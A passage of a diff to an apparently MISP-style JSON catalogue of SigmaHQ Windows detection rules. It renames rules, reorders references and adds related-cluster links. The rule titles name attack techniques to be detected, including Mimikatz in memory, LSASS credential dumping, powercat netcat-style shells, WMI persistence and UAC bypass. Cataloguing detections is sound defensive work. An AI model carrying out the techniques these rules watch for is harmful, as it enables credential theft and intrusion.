"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" ], "tags": [ @@ -15693,6 +19575,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", "value": "New Network Provider - Registry" }, @@ -15709,8 +19600,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" ], @@ -15755,16 +19646,16 @@ "falsepositive": [ "Legitimate registration of IFilters by the OS or software" ], - "filename": "registry_set_ifilter_persistence.yml", + "filename": "registry_set_persistence_ifilter.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1468548924600459267", - "https://persistence-info.github.io/Data/ifilters.html", "https://github.com/gtworek/PSBits/tree/master/IFilter", + "https://persistence-info.github.io/Data/ifilters.html", "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml" ], "tags": [ "attack.persistence" @@ -15810,8 +19701,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://forensafe.com/blogs/typedpaths.html", "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" ], "tags": [ @@ -15819,7 +19710,7 @@ ] }, "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", - "value": "Persistence Via TypedPaths" + "value": "Potential Persistence Via TypedPaths" }, { "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", @@ -15835,8 +19726,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" ], "tags": [ @@ -15894,6 +19785,15 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", "value": "dotNET DLL Loaded Via Office Applications" }, @@ -15912,9 +19812,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ + "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", "https://twitter.com/dez_/status/986614411711442944", "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", - "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" ], "tags": [ @@ -15922,6 +19822,15 @@ "attack.t1220" ] }, + "related": [ + { + "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", "value": "WMIC Loading Scripting Libraries" }, @@ -15947,6 +19856,15 @@ "attack.t1055" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "value": "Potential DLL Sideloading Using Coregen.exe" }, @@ -15971,6 +19889,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "49329257-089d-46e6-af37-4afce4290685", "value": "SharpEvtMute Imphash EvtMuteHook Load" }, @@ -15987,8 +19914,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/binderlabs/DirCreate2System", "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", + "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml" ], "tags": [ @@ -16016,9 +19943,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/bohops/WSMan-WinRM", - "https://twitter.com/chadtilbury/status/1275851297770610688", - "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", + "https://twitter.com/chadtilbury/status/1275851297770610688", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" ], "tags": [ @@ -16028,6 +19955,22 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "value": "Suspicious WSMAN Provider Image Loads" }, @@ -16052,6 +19995,15 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", "value": "Active Directory Parsing DLL Loaded Via Office Applications" }, @@ -16078,6 +20030,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", "value": "Image Load of VSS_PS.dll by Uncommon Executable" }, @@ -16105,6 +20066,15 @@ "attack.t1574.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "value": "UAC Bypass With Fake DLL" }, @@ -16121,8 +20091,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/tifkin_/status/1321916444557365248", "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml" ], "tags": [ @@ -16130,6 +20100,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", "value": "PCRE.NET Package Image Load" }, @@ -16154,6 +20133,15 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", "value": "GAC DLL Loaded Via Office Applications" }, @@ -16180,6 +20168,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", "value": "UAC Bypass Using Iscsicpl - ImageLoad" }, @@ -16204,6 +20201,15 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", "value": "CLR DLL Loaded Via Office Applications" }, @@ -16256,6 +20262,15 @@ "car.2019-04-004" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", "value": "Mimikatz In-Memory" }, @@ -16280,6 +20295,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", "value": "WMI Persistence - Command Line Event Consumer" }, @@ -16323,12 +20347,12 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/Wh04m1001/SysmonEoP", "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", - "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/Wh04m1001/SysmonEoP", + "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" ], "tags": [ @@ -16340,7 +20364,7 @@ ] }, "uuid": "6b98b92b-4f00-4f62-b4fe-4d1920215771", - "value": "Sideloading Of Non-Existent DLLs From System Folders" + "value": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders" }, { "description": "Detects DLL sideloading of DLLs that are part of web browsers", @@ -16418,6 +20442,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "value": "Image Load of VSS Dll by Uncommon Executable" }, @@ -16434,8 +20467,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp", "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/", + "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml" ], "tags": [ @@ -16470,6 +20503,15 @@ "attack.t1071" ] }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "value": "SILENTTRINITY Stager Execution - DLL" }, @@ -16511,10 +20553,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", - "https://hijacklibs.net/", "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", + "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://hijacklibs.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" ], "tags": [ @@ -16526,7 +20568,7 @@ ] }, "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "value": "System DLL Sideloading From Non System Locations" + "value": "Potential System DLL Sideloading From Non System Locations" }, { "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", @@ -16549,6 +20591,15 @@ "attack.t1218.003" ] }, + "related": [ + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", "value": "Cmstp Suspicious DLL Load" }, @@ -16573,6 +20624,15 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", "value": "Active Directory Kerberos DLL Loaded Via Office Applications" }, @@ -16589,9 +20649,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", - "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", + "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml" ], "tags": [ @@ -16599,6 +20659,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1", "value": "Load of dbghelp/dbgcore DLL from Suspicious Process" }, @@ -16680,6 +20749,15 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f354eba5-623b-450f-b073-0b5b2773b6aa", "value": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load" }, @@ -16710,7 +20788,7 @@ "value": "Python Py2Exe Image Load" }, { - "description": "Detects CLR DLL being loaded by an scripting applications", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript", "meta": { "author": "omkar72, oscd.community", "creation_date": "2020/10/14", @@ -16723,6 +20801,7 @@ "logsource.product": "windows", "refs": [ "https://github.com/tyranid/DotNetToJScript", + "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://thewover.github.io/Introducing-Donut/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" @@ -16783,6 +20862,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe6e002f-f244-4278-9263-20e4b593827f", "value": "Alternate PowerShell Hosts - Image" }, @@ -16835,6 +20923,15 @@ "attack.t1587" ] }, + "related": [ + { + "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "value": "FoggyWeb Backdoor DLL Loading" }, @@ -16914,6 +21011,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e", "value": "WMI Modules Loaded" }, @@ -16939,6 +21045,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", "value": "Rundll32 Loading Renamed Comsvcs DLL" }, @@ -16964,6 +21079,15 @@ "cve.2022.30190" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "value": "MSDT.exe Loading Diagnostic Library" }, @@ -17012,11 +21136,20 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", "value": "Unsigned Image Loaded Into LSASS Process" }, { - "description": "Detects DLL's Loaded Via Word Containing VBA Macros", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", "meta": { "author": "Antonlovesdnb", "creation_date": "2020/02/19", @@ -17036,8 +21169,17 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", - "value": "VBA DLL Loaded Via Microsoft Word" + "value": "VBA DLL Loaded Via Office Application" }, { "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", @@ -17127,8 +21269,8 @@ "logsource.product": "windows", "refs": [ "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", "https://twitter.com/HunterPlaybook/status/1301207718355759107", + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" ], "tags": [ @@ -17138,6 +21280,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", "value": "WMI Script Host Process Image Loaded" }, @@ -17164,6 +21315,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", "value": "In-memory PowerShell" }, @@ -17190,6 +21350,15 @@ "attack.t1021.002" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", "value": "Wmiprvse Wbemcomn DLL Hijack" }, @@ -17269,6 +21438,15 @@ "cve.2021.34527" ] }, + "related": [ + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", "value": "Windows Spooler Service Suspicious Binary Load" }, @@ -17312,8 +21490,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", + "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" ], @@ -17339,9 +21517,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://twitter.com/oulusoyum/status/1191329746069655553", "https://twitter.com/mattifestation/status/1196390321783025666", - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" ], "tags": [ @@ -17351,6 +21529,22 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", "value": "Time Travel Debugging Utility Usage - Image" }, @@ -17401,6 +21595,22 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", "value": "Suspicious Encoded Scripts in a WMI Consumer" }, @@ -17424,6 +21634,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", "value": "WMI Event Subscription" }, @@ -17440,9 +21659,9 @@ "logsource.category": "wmi_event", "logsource.product": "windows", "refs": [ - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", + "https://github.com/RiccardoAncarani/LiquidSnake", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" ], "tags": [ @@ -17450,6 +21669,15 @@ "attack.t1059.005" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "value": "Suspicious Scripting in a WMI Consumer" }, @@ -17466,8 +21694,8 @@ "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ - "https://github.com/besimorhino/powercat", "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" ], @@ -17476,6 +21704,15 @@ "attack.t1095" ] }, + "related": [ + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", "value": "Netcat The Powershell Version" }, @@ -17493,8 +21730,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/bohops/WSMan-WinRM", - "https://twitter.com/chadtilbury/status/1275851297770610688", "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://twitter.com/chadtilbury/status/1275851297770610688", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" ], "tags": [ @@ -17504,6 +21741,22 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "value": "Suspicious Non PowerShell WSMAN COM Provider" }, @@ -17528,6 +21781,15 @@ "attack.t1049" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", "value": "Use Get-NetTCPConnection" }, @@ -17554,6 +21816,22 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", "value": "Remote PowerShell Session (PS Classic)" }, @@ -17579,6 +21857,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", "value": "PowerShell Called from an Executable Version Mismatch" }, @@ -17604,6 +21891,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell" }, @@ -17630,6 +21926,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", "value": "Alternate PowerShell Hosts" }, @@ -17655,6 +21960,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6331d09b-4785-4c13-980f-f96661356249", "value": "PowerShell Downgrade Attack - PowerShell" }, @@ -17680,6 +21994,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": 